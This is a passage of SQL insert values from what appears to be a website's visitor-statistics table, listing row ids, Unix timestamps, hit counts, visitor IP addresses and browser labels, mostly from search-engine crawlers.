ther'),(7388,1456296208,2,2,0,0,'141.8.184.6','other'),(7389,1456296209,2,2,0,0,'130.193.51.22','other'),(7390,1456296211,1,1,0,0,'5.255.253.9','other'),(7391,1456296212,1,1,0,0,'130.193.37.27','other'),(7392,1456296213,2,2,0,0,'130.193.50.22','other'),(7393,1456296215,1,1,0,0,'93.158.152.9','other'),(7394,1456296216,2,2,0,0,'141.8.142.88','other'),(7395,1456296221,1,1,0,0,'130.193.51.7','other'),(7397,1456296223,1,1,0,0,'178.154.189.6','other'),(7398,1456296224,2,2,0,0,'93.158.152.65','other'),(7399,1456296226,1,1,0,0,'141.8.183.14','other'),(7400,1456296462,2,2,0,0,'178.154.149.11','other'),(7402,1456296463,1,1,0,0,'130.193.51.102','other'),(7403,1456296464,1,1,0,0,'141.8.132.76','other'),(7404,1456296466,1,1,0,0,'141.8.132.48','other'),(7405,1456296798,1,1,0,0,'8.29.198.26','other'),(7406,1456296935,42,42,0,0,'80.91.162.99','other'),(7407,1456297000,1,1,0,0,'66.249.78.30','other'),(7408,1456297307,1,1,0,0,'217.69.133.60','other'),(7409,1456297564,1,1,0,0,'91.196.179.69','chrome'),(7410,1456297570,1,1,0,0,'91.196.178.68','firefox'),(7411,1456297596,1,1,0,0,'66.249.93.94','firefox'),(7412,1456297851,1,1,0,0,'66.249.92.99','other'),(7413,1456298013,3,3,0,0,'91.196.178.71','firefox'),(7414,1456298194,1,1,0,0,'91.196.179.33','chrome'),(7415,1456298260,1,1,0,0,'95.213.6.72','other'),(7416,1456298601,1,1,0,0,'173.252.105.116','other'),(7418,1456298629,1,1,0,0,'66.220.158.111','other'),(7419,1456298630,1,1,0,0,'66.220.158.122','other'),(7420,1456299290,1,1,0,0,'91.196.178.33','chrome'),(7421,1456299597,1,1,0,0,'178.94.33.35','msie'),(7422,1456299733,3,3,0,0,'130.193.51.43','other'),(7423,1456299737,1,1,0,0,'93.158.152.65','other'),(7424,1456299745,1,1,0,0,'5.255.253.89','other'),(7425,1456299749,1,1,0,0,'5.255.253.9','other'),(7426,1456299753,1,1,0,0,'130.193.50.22','other'),(7427,1456299757,1,1,0,0,'130.193.51.22','other'),(7428,1456299761,2,2,0,0,'178.154.149.11','other'),(7429,1456299769,1,1,0,0,'141.8.142.41','other'),(7430,1456299773,1,1,0,0,'141.8.132.97','other'),(7431,1456299781,1,1,0,0,'141.8.183.14','other'),(7432,1456299785,1,1,0,0,'130.193.51.45','other'),(7433,1456299789,1,1,0,0,'141.8.132.2','other'),(7434,1456299794,1,1,0,0,'93.158.152.26','other'),(7435,1456299846,1,1,0,0,'93.78.239.187','chrome'),(7436,1456299884,1,1,0,0,'207.46.13.127','other'),(7437,1456300589,1,1,0,0,'92.112.21.86','firefox'),(7438,1456300723,1,1,0,0,'217.69.133.18','other'),(7439,1456301015,1,1,0,0,'217.69.133.237','other'),(7440,1456301077,1,1,0,0,'66.249.66.129','other'),(7441,1456301109,2,2,0,0,'62.210.215.100','chrome'),(7442,1456301224,1,0,1,0,'68.180.229.232',''),(7443,1456301229,1,1,0,0,'91.196.178.101','chrome'),(7444,1456301484,1,1,0,0,'141.0.14.209','other'),(7445,1456301557,1,0,1,0,'66.249.78.151',''),(7446,1456301926,1,1,0,0,'82.145.220.169','chrome'),(7447,1456302064,1,1,0,0,'91.196.178.72','chrome'),(7448,1456302166,1,1,0,0,'78.111.190.34','chrome'),(7449,1456302300,1,1,0,0,'180.76.15.8','other'),(7450,1456302307,3,0,3,0,'68.180.229.232',''),(7451,1456302508,19,19,0,0,'141.8.184.18','other'),(7452,1456302649,1,1,0,0,'91.196.178.133','chrome'),(7453,1456302714,1,1,0,0,'91.196.178.136','firefox'),(7454,1456302931,1,1,0,0,'93.158.152.9','other'),(7455,1456302943,1,1,0,0,'141.8.183.14','other'),(7456,1456302955,4,4,0,0,'178.154.149.11','other'),(7457,1456303011,1,1,0,0,'91.196.178.164','chrome'),(7458,1456303178,1,1,0,0,'66.249.66.133','other'),(7459,1456303540,1,1,0,0,'178.33.168.215','chrome'),(7460,1456303780,1,1,0,0,'217.69.136.208','other'),(7461,1456304359,1,1,0,0,'91.196.178.37','chrome'),(7462,1456304391,1,1,0,0,'91.196.178.132','chrome'),(7463,1456304623,1,1,0,0,'78.111.190.7','firefox'),(7464,1456304836,1,1,0,0,'51.255.65.25','other'),(7465,1456305041,1,0,1,0,'68.180.229.232',''),(7466,1456305179,2,2,0,0,'141.8.183.14','other'),(7467,1456305183,1,1,0,0,'141.8.132.99','other'),(7468,1456305187,1,1,0,0,'141.8.184.18','other'),(7469,1456305192,4,4,0,0,'93.158.152.9','other'),(7470,1456305195,1,1,0,0,'178.154.149.11','other'),(7471,1456305200,1,1,0,0,'5.255.253.53','other'),(7472,1456305208,2,2,0,0,'130.193.37.21','other'),(7473,1456305220,1,1,0,0,'5.255.253.103','other'),(7474,1456305224,2,2,0,0,'141.8.142.88','other'),(7475,1456306243,1,1,0,0,'66.249.78.151','other'),(7476,1456306907,1,1,0,0,'157.55.39.176','other'),(7477,1456306985,1,1,0,0,'180.76.15.140','other'),(7478,1456307274,1,1,0,0,'66.249.78.37','other'),(7479,1456307361,2,2,0,0,'141.8.184.18','other'),(7480,1456307423,1,0,1,0,'66.249.78.144',''),(7481,1456307630,1,1,0,0,'8.29.198.25','other'),(7482,1456307668,1,1,0,0,'66.249.78.144','other'),(7483,1456307672,1,1,0,0,'94.179.37.221','firefox'),(7484,1456308105,5,5,0,0,'141.8.183.14','other'),(7485,1456308166,1,1,0,0,'37.52.115.6','other'),(7486,1456308296,2,2,0,0,'94.179.87.66','chrome'),(7487,1456308305,4,4,0,0,'93.158.152.9','other'),(7488,1456308318,1,1,0,0,'5.255.253.100','other'),(7489,1456308326,3,3,0,0,'141.8.132.99','other'),(7490,1456308330,2,2,0,0,'5.255.253.53','other'),(7491,1456308334,2,2,0,0,'130.193.37.21','other'),(7492,1456308339,1,1,0,0,'178.154.149.11','other'),(7493,1456308364,1,1,0,0,'91.196.178.68','firefox'),(7494,1456308581,1,1,0,0,'5.83.23.12','chrome'),(7495,1456308586,1,1,0,0,'66.249.78.158','other'),(7496,1456308681,2,0,2,0,'68.180.229.232',''),(7497,1456308690,1,1,0,0,'66.249.66.158','other'),(7498,1456308959,1,1,0,0,'141.0.12.143','chrome'),(7499,1456309001,1,1,0,0,'66.249.92.103','other'),(7500,1456309003,1,1,0,0,'66.249.78.144','other'),(7501,1456309357,1,1,0,0,'207.46.13.174','other'),(7502,1456309364,1,1,0,0,'66.249.66.129','other'),(7503,1456309684,1,1,0,0,'66.249.78.30','other'),(7504,1456309694,1,1,0,0,'66.249.78.158','other'),(7505,1456309909,1,1,0,0,'66.249.66.158','other'),(7506,1456309915,1,0,1,0,'68.180.229.232',''),(7507,1456309957,2,2,0,0,'40.77.167.19','other'),(7508,1456310283,2,2,0,0,'207.46.13.174','other'),(7509,1456310316,7,7,0,0,'141.8.184.18','other'),(7510,1456310413,4,4,0,0,'178.154.149.11','other'),(7511,1456310421,3,3,0,0,'5.255.253.53','other'),(7512,1456310429,5,5,0,0,'141.8.183.14','other'),(7513,1456310442,1,1,0,0,'141.8.132.99','other'),(7515,1456310450,2,2,0,0,'130.193.37.21','other'),(7516,1456310451,1,1,0,0,'178.93.148.48','firefox'),(7517,1456310458,3,3,0,0,'93.158.152.9','other'),(7518,1456310515,1,1,0,0,'66.249.93.86','firefox'),(7519,1456310554,1,1,0,0,'66.249.93.90','firefox'),(7520,1456310668,1,1,0,0,'78.111.186.89','chrome'),(7521,1456310731,1,1,0,0,'207.46.13.91','other'),(7522,1456310846,1,1,0,0,'66.249.78.158','other'),(7523,1456311085,2,2,0,0,'141.0.12.143','chrome'),(7524,1456311558,1,1,0,0,'66.249.66.162','other'),(7525,1456312171,1,1,0,0,'78.111.190.7','firefox'),(7526,1456312362,1,1,0,0,'157.55.39.5','other'),(7527,1456312455,1,1,0,0,'141.8.184.18','other'),(7528,1456312576,1,1,0,0,'62.210.215.100','chrome'),(7529,1456312577,1,1,0,0,'91.196.178.38','chrome'),(7530,1456312735,1,1,0,0,'91.196.178.34','firefox'),(7531,1456312908,1,1,0,0,'37.52.22.104','firefox'),(7532,1456312911,1,1,0,0,'107.178.194.125','chrome'),(7533,1456312927,1,1,0,0,'93.158.152.26','other'),(7534,1456312931,1,1,0,0,'178.154.149.11','other'),(7535,1456312935,1,1,0,0,'141.8.132.79','other'),(7536,1456312940,1,1,0,0,'130.193.51.102','other'),(7537,1456313100,2,2,0,0,'141.8.142.41','other'),(7538,1456313104,1,1,0,0,'130.193.51.45','other'),(7539,1456313108,2,2,0,0,'141.8.132.97','other'),(7540,1456313112,2,2,0,0,'141.8.142.8','other'),(7541,1456313116,2,2,0,0,'5.255.253.10','other'),(7542,1456313120,1,1,0,0,'141.8.132.76','other'),(7543,1456313124,1,1,0,0,'5.255.253.100','other'),(7544,1456313129,1,1,0,0,'5.255.253.110','other'),(7545,1456313133,1,1,0,0,'141.8.183.14','other'),(7546,1456313137,1,1,0,0,'130.193.51.81','other'),(7547,1456313141,1,1,0,0,'130.193.51.85','other'),(7548,1456313150,1,1,0,0,'5.255.253.55','other'),(7549,1456313153,1,1,0,0,'141.8.132.99','other'),(7550,1456313339,1,1,0,0,'157.55.39.5','other'),(7551,1456313526,2,2,0,0,'207.46.13.91','other'),(7552,1456313641,1,1,0,0,'178.95.157.215','chrome'),(7553,1456313647,1,0,1,0,'68.180.229.232',''),(7554,1456314371,1,1,0,0,'91.196.178.35','chrome'),(7555,1456314384,1,1,0,0,'217.69.133.238','other'),(7557,1456314909,1,1,0,0,'180.76.15.163','other'),(7558,1456314916,1,1,0,0,'91.196.178.68','chrome'),(7559,1456314967,1,1,0,0,'31.43.4.193','chrome'),(7560,1456314976,1,1,0,0,'180.76.15.152','other'),(7561,1456315330,1,1,0,0,'207.46.13.174','other'),(7562,1456315418,1,1,0,0,'91.196.178.71','firefox'),(7563,1456315702,1,1,0,0,'217.69.133.85','other'),(7564,1456315749,1,1,0,0,'37.53.89.22','chrome'),(7565,1456315828,1,0,1,0,'66.249.66.166',''),(7566,1456315954,3,3,0,0,'130.193.51.102','other'),(7567,1456315957,3,3,0,0,'141.8.132.76','other'),(7568,1456316399,1,1,0,0,'91.196.178.70','msie'),(7569,1456316541,1,0,1,0,'66.249.78.151',''),(7570,1456316547,2,2,0,0,'141.8.132.97','other'),(7571,1456316548,2,2,0,0,'5.255.253.110','other'),(7572,1456316549,3,3,0,0,'5.255.253.30','other'),(7573,1456316550,2,2,0,0,'141.8.184.22','other'),(7574,1456316551,2,2,0,0,'141.8.132.79','other'),(7575,1456316552,3,3,0,0,'141.8.142.41','other'),(7576,1456316554,2,2,0,0,'130.193.51.85','other'),(7577,1456316555,2,2,0,0,'93.158.152.9','other'),(7578,1456316558,1,1,0,0,'5.255.253.100','other'),(7579,1456316559,1,1,0,0,'130.193.51.45','other'),(7581,1456316560,2,2,0,0,'93.158.152.26','other'),(7582,1456316561,3,3,0,0,'141.8.184.11','other'),(7583,1456316563,2,2,0,0,'130.193.51.81','other'),(7584,1456316564,3,3,0,0,'141.8.132.99','other'),(7585,1456316568,1,1,0,0,'95.134.2.66','chrome'),(7586,1456316570,2,2,0,0,'141.8.142.8','other'),(7587,1456316571,2,2,0,0,'141.8.183.14','other'),(7588,1456316572,1,1,0,0,'130.193.37.21','other'),(7589,1456316573,2,2,0,0,'130.193.51.43','other'),(7590,1456316575,1,1,0,0,'141.8.132.2','other'),(7592,1456316577,2,2,0,0,'141.8.142.10','other'),(7593,1456316586,1,1,0,0,'141.8.142.88','other'),(7594,1456316588,1,1,0,0,'5.255.253.55','other'),(7595,1456316589,1,1,0,0,'130.193.37.27','other'),(7596,1456316592,1,1,0,0,'178.154.149.11','other'),(7597,1456316692,2,2,0,0,'157.55.39.5','other'),(7598,1456316780,1,1,0,0,'66.249.78.158','other'),(7599,1456317225,2,2,0,0,'5.255.253.9','other'),(7600,1456317479,3,3,0,0,'130.193.51.81','other'),(7601,1456317765,4,4,0,0,'5.255.253.55','other'),(7602,1456317772,2,2,0,0,'141.8.132.99','other'),(7603,1456317774,3,3,0,0,'141.8.132.2','other'),(7604,1456317775,2,2,0,0,'141.8.142.88','other'),(7605,1456317776,3,3,0,0,'141.8.183.14','other'),(7606,1456317777,3,3,0,0,'5.255.253.100','other'),(7607,1456317778,1,1,0,0,'5.255.253.10','other'),(7608,1456317784,1,1,0,0,'141.8.132.97','other'),(7609,1456317786,1,1,0,0,'130.193.51.85','other'),(7610,1456317844,2,2,0,0,'141.8.142.41','other'),(7611,1456317846,2,2,0,0,'130.193.51.45','other'),(7612,1456317847,3,3,0,0,'141.8.184.11','other'),(7613,1456317848,3,3,0,0,'141.8.184.22','other'),(7614,1456317849,3,3,0,0,'5.255.253.110','other'),(7615,1456317850,3,3,0,0,'130.193.37.27','other'),(7616,1456317851,3,3,0,0,'141.8.142.8','other'),(7617,1456317859,3,3,0,0,'130.193.51.43','other'),(7618,1456317866,2,2,0,0,'130.193.51.102','other'),(7619,1456317873,1,1,0,0,'5.255.253.30','other'),(7620,1456317874,2,2,0,0,'141.8.184.18','other'),(7621,1456317881,2,2,0,0,'141.8.142.10','other'),(7622,1456317883,1,1,0,0,'130.193.51.7','other'),(7623,1456317886,1,1,0,0,'141.8.132.79','other'),(7624,1456317893,2,2,0,0,'178.154.149.11','other'),(7626,1456317894,1,1,0,0,'130.193.37.21','other'),(7627,1456317896,1,1,0,0,'66.249.78.37','other'),(7628,1456317901,1,1,0,0,'5.255.253.53','other'),(7629,1456317904,2,2,0,0,'141.8.132.76','other'),(7630,1456318383,1,1,0,0,'66.249.78.44','other'),(7631,1456318445,1,0,1,0,'68.180.229.232',''),(7632,1456318497,1,1,0,0,'8.29.198.25','other'),(7633,1456318746,1,1,0,0,'5.255.253.9','other'),(7634,1456318749,1,1,0,0,'141.8.142.88','other'),(7635,1456318750,1,1,0,0,'5.255.253.100','other'),(7636,1456319078,1,1,0,0,'66.249.78.151','other'),(7637,1456319310,1,1,0,0,'66.249.92.103','other'),(7638,1456319582,1,1,0,0,'217.69.133.193','other'),(7639,1456319773,1,1,0,0,'130.193.51.43','other'),(7640,1456319797,1,0,1,0,'66.249.78.158',''),(7641,1456319856,1,1,0,0,'37.55.226.133','firefox'),(7642,1456319935,1,0,1,0,'68.180.229.232',''),(7643,1456320097,19,19,0,0,'178.154.149.11','other'),(7645,1456320098,15,15,0,0,'141.8.184.18','other'),(7646,1456320102,1,1,0,0,'93.158.152.9','other'),(7647,1456320104,6,6,0,0,'141.8.183.14','other'),(7648,1456320367,1,1,0,0,'91.196.178.131','chrome'),(7649,1456320558,1,1,0,0,'178.93.110.82','opera'),(7650,1456320648,1,0,1,0,'66.249.66.162',''),(7651,1456320821,2,2,0,0,'91.196.178.129','chrome'),(7652,1456321217,2,2,0,0,'207.46.13.174','other'),(7653,1456321250,1,1,0,0,'5.255.253.9','other'),(7654,1456321268,1,1,0,0,'178.93.150.74','chrome'),(7655,1456321355,1,1,0,0,'217.69.133.237','other'),(7656,1456321558,1,1,0,0,'78.111.190.31','chrome'),(7657,1456321577,2,2,0,0,'66.249.78.144','other'),(7658,1456321621,1,1,0,0,'91.124.62.144','chrome'),(7659,1456321702,1,1,0,0,'141.8.184.18','other'),(7660,1456321801,1,1,0,0,'91.196.178.70','firefox'),(7661,1456322240,2,0,2,0,'68.180.229.232',''),(7662,1456322928,1,1,0,0,'78.111.190.31','chrome'),(7663,1456323011,1,1,0,0,'62.210.215.100','chrome'),(7664,1456324034,1,0,1,0,'68.180.229.232',''),(7665,1456324513,1,1,0,0,'178.94.49.64','chrome'),(7666,1456324839,1,0,1,0,'66.249.78.151',''),(7667,1456324979,1,1,0,0,'141.8.184.11','other'),(7668,1456325052,1,1,0,0,'178.93.110.82','opera'),(7669,1456325061,1,1,0,0,'141.8.184.18','other'),(7670,1456325666,1,0,1,0,'68.180.229.232',''),(7671,1456326254,1,1,0,0,'217.69.143.57','other'),(7672,1456326365,1,1,0,0,'46.164.144.179','firefox'),(7673,1456326506,2,2,0,0,'130.193.51.50','other'),(7674,1456326507,4,4,0,0,'130.193.37.21','other'),(7675,1456326508,1,1,0,0,'5.255.253.10','other'),(7676,1456326509,1,1,0,0,'5.255.253.55','other'),(7677,1456326510,3,3,0,0,'130.193.50.22','other'),(7678,1456326511,3,3,0,0,'178.154.149.11','other'),(7680,1456326512,2,2,0,0,'5.255.253.9','other'),(7681,1456326591,1,1,0,0,'207.46.13.179','other'),(7682,1456326802,1,1,0,0,'5.255.253.100','other'),(7683,1456326803,4,4,0,0,'130.193.51.81','other'),(7684,1456326804,2,2,0,0,'141.8.132.76','other'),(7685,1456326806,1,1,0,0,'93.158.152.81','other'),(7686,1456326808,2,2,0,0,'178.154.189.6','other'),(7687,1456326813,1,1,0,0,'93.158.152.9','other'),(7688,1456326814,2,2,0,0,'141.8.132.2','other'),(7689,1456326815,2,2,0,0,'5.255.253.30','other'),(7690,1456326816,1,1,0,0,'141.8.183.14','other'),(7691,1456326819,2,2,0,0,'130.193.37.27','other'),(7692,1456326821,1,1,0,0,'93.158.152.26','other'),(7693,1456326916,1,1,0,0,'207.46.13.127','other'),(7694,1456326961,1,1,0,0,'91.196.178.72','firefox'),(7695,1456327282,1,1,0,0,'217.69.133.217','other'),(7696,1456328377,1,1,0,0,'178.94.233.119','chrome'),(7697,1456328485,1,0,1,0,'68.180.229.232',''),(7698,1456328995,1,1,0,0,'5.255.253.9','other'),(7700,1456328996,2,2,0,0,'130.193.51.102','other'),(7701,1456328997,1,1,0,0,'141.8.142.88','other'),(7703,1456328998,1,1,0,0,'5.255.253.55','other'),(7704,1456329002,2,2,0,0,'130.193.51.43','other'),(7705,1456329003,1,1,0,0,'141.8.132.79','other'),(7706,1456329004,2,2,0,0,'130.193.51.50','other'),(7707,1456329007,1,1,0,0,'141.8.132.76','other'),(7708,1456329009,1,1,0,0,'217.69.136.208','other'),(7709,1456329013,2,2,0,0,'93.158.152.81','other'),(7710,1456329015,2,2,0,0,'130.193.37.27','other'),(7711,1456329019,3,3,0,0,'5.255.253.30','other'),(7712,1456329021,1,1,0,0,'93.158.152.26','other'),(7713,1456329028,1,1,0,0,'141.8.183.14','other'),(7714,1456329032,1,1,0,0,'93.158.152.9','other'),(7715,1456329035,1,1,0,0,'178.154.189.6','other'),(7716,1456329037,1,1,0,0,'141.8.184.22','other'),(7717,1456329397,1,1,0,0,'8.29.198.26','other'),(7718,1456329505,1,0,1,0,'66.249.78.144',''),(7719,1456329631,1,1,0,0,'207.46.13.91','other'),(7720,1456329754,1,1,0,0,'207.46.13.179','other'),(7721,1456329825,1,1,0,0,'207.46.13.127','other'),(7722,1456330381,1,1,0,0,'66.249.92.103','other'),(7723,1456330793,1,0,1,0,'68.180.229.232',''),(7724,1456331023,1,1,0,0,'66.249.93.94','firefox'),(7725,1456331453,1,1,0,0,'5.255.253.9','other'),(7726,1456331454,1,1,0,0,'130.193.51.81','other'),(7727,1456331570,1,1,0,0,'178.154.189.6','other'),(7728,1456331572,1,1,0,0,'141.8.183.14','other'),(7730,1456331721,1,1,0,0,'82.193.127.15','other'),(7731,1456332065,1,1,0,0,'180.76.15.23','other'),(7732,1456332176,1,1,0,0,'217.69.136.206','other'),(7733,1456332268,1,1,0,0,'91.196.178.167','chrome'),(7734,1456332606,1,0,1,0,'68.180.229.232',''),(7735,1456333235,1,1,0,0,'37.53.89.22','chrome'),(7736,1456333480,2,2,0,0,'93.158.152.9','other'),(7738,1456333481,2,2,0,0,'5.255.253.100','other'),(7739,1456333482,3,3,0,0,'141.8.132.99','other'),(7740,1456333483,3,3,0,0,'5.255.253.53','other'),(7742,1456333484,3,3,0,0,'141.8.184.18','other'),(7743,1456333485,2,2,0,0,'130.193.37.21','other'),(7744,1456333487,1,1,0,0,'141.8.183.14','other'),(7745,1456333786,1,1,0,0,'51.255.65.17','other'),(7746,1456333966,1,1,0,0,'37.52.22.38','chrome'),(7747,1456334009,1,1,0,0,'62.210.215.100','chrome'),(7748,1456334054,1,1,0,0,'46.211.115.14','chrome'),(7749,1456334269,2,2,0,0,'46.211.0.235','chrome'),(7750,1456334446,2,0,2,0,'68.180.229.232',''),(7751,1456334824,1,1,0,0,'51.255.65.29','other'),(7752,1456335633,1,1,0,0,'94.179.28.33','firefox'),(7753,1456335796,1,1,0,0,'193.194.127.217','firefox'),(7754,1456336081,1,1,0,0,'51.255.65.96','other'),(7755,1456336703,1,0,1,0,'68.180.229.232',''),(7756,1456336876,1,1,0,0,'93.158.152.65','other'),(7757,1456336877,1,1,0,0,'130.193.51.22','other'),(7758,1456336878,1,1,0,0,'130.193.37.21','other'),(7760,1456336880,1,1,0,0,'141.8.142.60','other'),(7762,1456336881,1,1,0,0,'141.8.132.66','other'),(7763,1456336882,1,1,0,0,'141.8.142.82','other'),(7764,1456336883,1,1,0,0,'5.255.253.53','other'),(7765,1456336884,1,1,0,0,'141.8.142.55','other'),(7767,1456336966,1,1,0,0,'92.113.156.165','firefox'),(7768,1456337036,1,1,0,0,'95.133.238.229','firefox'),(7769,1456337111,1,1,0,0,'207.46.13.91','other'),(7770,1456337281,1,1,0,0,'51.255.65.40','other'),(7771,1456337650,1,1,0,0,'217.69.133.60','other'),(7772,1456337819,1,0,1,0,'66.249.78.151',''),(7773,1456337922,1,1,0,0,'46.211.3.101','chrome'),(7774,1456338194,1,1,0,0,'66.102.9.84','firefox'),(7775,1456338318,4,0,4,0,'68.180.229.232',''),(7776,1456338385,1,1,0,0,'91.196.178.132','firefox'),(7777,1456338415,1,1,0,0,'5.255.253.53','other'),(7778,1456338416,1,1,0,0,'141.8.132.99','other'),(7780,1456338417,1,1,0,0,'130.193.51.81','other'),(7781,1456338450,1,1,0,0,'178.154.189.12','other'),(7782,1456338452,1,1,0,0,'93.158.152.65','other'),(7783,1456338453,1,1,0,0,'141.8.142.82','other'),(7784,1456338454,1,1,0,0,'141.8.142.88','other'),(7785,1456338460,1,1,0,0,'217.69.133.233','other'),(7786,1456339428,1,1,0,0,'207.46.13.91','other'),(7787,1456339716,1,1,0,0,'207.46.13.174','other'),(7788,1456340189,1,1,0,0,'180.76.15.32','other'),(7789,1456340291,1,1,0,0,'8.29.198.25','other'),(7790,1456340941,1,1,0,0,'66.249.92.99','other'),(7791,1456340956,1,1,0,0,'5.255.253.51','other'),(7792,1456340957,1,1,0,0,'5.255.253.94','other'),(7793,1456341629,1,1,0,0,'130.193.51.109','other'),(7794,1456341819,1,1,0,0,'178.154.149.11','other'),(7795,1456342211,1,0,1,0,'66.249.78.151',''),(7796,1456342241,1,0,1,0,'66.249.66.158',''),(7797,1456342386,1,1,0,0,'62.141.50.118','other'),(7798,1456342581,1,1,0,0,'66.249.78.158','other'),(7799,1456342691,1,1,0,0,'62.210.215.100','chrome'),(7800,1456342726,5,5,0,0,'94.178.6.27','other'),(7801,1456343180,1,1,0,0,'141.0.13.123','chrome'),(7802,1456343914,1,1,0,0,'94.178.6.27','other'),(7803,1456343932,1,0,1,0,'66.249.66.166',''),(7804,1456344451,1,1,0,0,'178.154.189.204','other'),(7805,1456344484,1,1,0,0,'5.255.253.51','other'),(7806,1456344555,1,1,0,0,'91.196.178.166','opera'),(7807,1456344931,1,0,1,0,'66.249.78.151',''),(7808,1456344973,1,1,0,0,'93.158.152.65','other'),(7809,1456344977,1,1,0,0,'141.8.132.99','other'),(7810,1456344981,1,1,0,0,'141.8.132.109','other'),(7811,1456344986,1,1,0,0,'141.8.184.18','other'),(7812,1456344990,1,1,0,0,'5.255.253.62','other'),(7813,1456344994,1,1,0,0,'130.193.51.55','other'),(7814,1456344998,1,1,0,0,'141.8.184.22','other'),(7815,1456345002,1,1,0,0,'5.255.253.103','other'),(7816,1456345296,2,2,0,0,'207.46.13.179','other'),(7817,1456345510,1,0,1,0,'66.249.78.158',''),(7818,1456345687,1,0,1,0,'68.180.229.232',''),(7819,1456345753,1,0,1,0,'66.249.66.162',''),(7820,1456345961,1,1,0,0,'62.210.215.100','chrome'),(7821,1456346256,1,1,0,0,'178.154.189.6','other'),(7822,1456346332,1,0,1,0,'66.249.78.144',''),(7823,1456347023,1,1,0,0,'207.46.13.179','other'),(7824,1456347118,1,1,0,0,'66.249.78.30','other'),(7825,1456347174,1,1,0,0,'130.193.37.27','other'),(7826,1456348114,1,1,0,0,'217.69.133.238','other'),(7827,1456348367,1,1,0,0,'66.249.78.158','other'),(7828,1456348570,1,1,0,0,'95.158.42.244','chrome'),(7829,1456348621,1,1,0,0,'217.69.136.204','other'),(7830,1456348804,1,1,0,0,'130.193.50.22','other'),(7831,1456348808,1,1,0,0,'5.255.253.55','other'),(7832,1456348895,1,1,0,0,'217.69.143.67','other'),(7833,1456349130,1,1,0,0,'141.8.132.44','other'),(7834,1456349739,1,1,0,0,'130.193.50.22','other'),(7835,1456350776,1,0,1,0,'68.180.229.232',''),(7836,1456351148,1,1,0,0,'8.29.198.26','other'),(7837,1456351348,1,1,0,0,'5.255.253.100','other'),(7838,1456351349,1,1,0,0,'130.193.51.45','other'),(7839,1456351439,1,1,0,0,'141.8.184.6','other'),(7840,1456351440,1,1,0,0,'5.255.253.17','other'),(7841,1456351901,1,1,0,0,'66.249.92.103','other'),(7842,1456352035,1,1,0,0,'217.69.133.72','other'),(7843,1456352725,1,0,1,0,'68.180.229.232',''),(7844,1456353169,300,300,0,0,'80.91.162.99','other'),(7845,1456353305,1,1,0,0,'207.46.13.127','other'),(7846,1456353442,1,0,1,0,'66.249.78.144',''),(7847,1456353587,1,1,0,0,'141.8.184.18','other'),(7848,1456353591,1,1,0,0,'130.193.37.21','other'),(7849,1456353595,1,1,0,0,'5.255.253.53','other'),(7850,1456353662,152,152,0,0,'82.193.127.15','other'),(7851,1456353934,1,1,0,0,'180.76.15.138','other'),(7852,1456353977,1,1,0,0,'180.76.15.163','other'),(7853,1456354113,1,1,0,0,'5.255.253.100','other'),(7854,1456354294,1,1,0,0,'37.9.122.203','other'),(7855,1456354564,1,1,0,0,'51.255.65.20','other'),(7856,1456355143,1,1,0,0,'207.46.13.179','other'),(7857,1456356047,1,1,0,0,'207.46.13.127','other'),(7858,1456356078,2,0,2,0,'68.180.229.232',''),(7859,1456356352,1,1,0,0,'180.76.15.162','other'),(7860,1456357024,1,1,0,0,'217.69.136.203','other'),(7861,1456357319,1,0,1,0,'68.180.229.232',''),(7862,1456357392,1,1,0,0,'62.210.215.100','chrome'),(7863,1456358535,2,2,0,0,'207.46.13.179','other'),(7864,1456358837,1,1,0,0,'217.69.133.6','other'),(7865,1456358924,1,1,0,0,'178.154.149.11','other'),(7866,1456359797,1,1,0,0,'207.46.13.43','other'),(7867,1456360512,1,0,1,0,'68.180.229.232',''),(7868,1456360547,1,1,0,0,'37.9.122.202','other'),(7869,1456361065,1,1,0,0,'217.69.133.10','other'),(7870,1456361267,1,1,0,0,'207.46.13.179','other'),(7871,1456361958,1,1,0,0,'8.29.198.26','other'),(7872,1456362066,1,0,1,0,'68.180.229.232',''),(7873,1456362437,1,1,0,0,'51.255.65.66','other'),(7874,1456362461,1,1,0,0,'66.249.92.99','other'),(7875,1456362770,1,1,0,0,'188.230.73.15','chrome'),(7876,1456363226,1,1,0,0,'141.8.184.18','other'),(7877,1456363227,1,1,0,0,'178.154.149.11','other'),(7878,1456363266,2,0,2,0,'68.180.229.232',''),(7879,1456364073,1,0,1,0,'66.249.78.158',''),(7880,1456364255,1,1,0,0,'207.46.13.43','other'),(7881,1456364538,1,0,1,0,'68.180.229.232',''),(7882,1456364860,1,1,0,0,'108.59.8.70','other'),(7883,1456365061,1,1,0,0,'130.193.50.201','other'),(7884,1456365921,1,1,0,0,'51.255.65.18','other'),(7885,1456366265,3,0,3,0,'68.180.229.232',''),(7886,1456366440,1,1,0,0,'141.8.184.18','other'),(7887,1456367938,1,0,1,0,'66.249.78.144',''),(7888,1456368318,1,1,0,0,'178.154.189.204','other'),(7889,1456368322,1,1,0,0,'130.193.50.201','other'),(7890,1456368587,1,1,0,0,'141.8.184.18','other'),(7891,1456369339,1,1,0,0,'62.210.215.100','chrome'),(7892,1456370056,1,1,0,0,'217.69.133.68','other'),(7893,1456370105,1,1,0,0,'217.69.133.15','other'),(7894,1456370239,1,0,1,0,'66.249.78.44',''),(7895,1456370449,2,2,0,0,'5.255.253.53','other'),(7896,1456370520,1,1,0,0,'89.31.57.5','chrome'),(7897,1456370862,1,1,0,0,'66.249.66.158','other'),(7898,1456371088,1,0,1,0,'68.180.229.232',''),(7899,1456371889,1,1,0,0,'109.163.234.8','other'),(7900,1456372496,1,1,0,0,'141.8.184.18','other'),(7901,1456372500,2,2,0,0,'141.8.183.14','other'),(7902,1456372773,1,1,0,0,'8.29.198.26','other'),(7903,1456372779,1,1,0,0,'180.76.15.7','other'),(7904,1456372888,1,1,0,0,'51.255.65.19','other'),(7905,1456373130,1,1,0,0,'207.46.13.43','other'),(7906,1456373504,1,1,0,0,'188.230.73.15','chrome'),(7907,1456373700,1,1,0,0,'66.249.92.95','other'),(7908,1456373783,1,1,0,0,'130.193.50.22','other'),(7909,1456373785,1,1,0,0,'5.255.253.17','other'),(7910,1456373787,1,1,0,0,'5.255.253.100','other'),(7911,1456373788,1,1,0,0,'141.8.142.41','other'),(7912,1456373792,1,1,0,0,'178.154.149.11','other'),(7913,1456373963,1,1,0,0,'217.69.133.216','other'),(7914,1456374143,1,0,1,0,'66.249.78.151',''),(7915,1456374252,1,1,0,0,'93.158.152.26','other'),(7916,1456374256,1,1,0,0,'141.8.142.10','other'),(7917,1456374769,1,1,0,0,'51.255.65.54','other'),(7918,1456375026,1,0,1,0,'66.249.78.144',''),(7919,1456375574,1,1,0,0,'141.8.184.18','other'),(7920,14563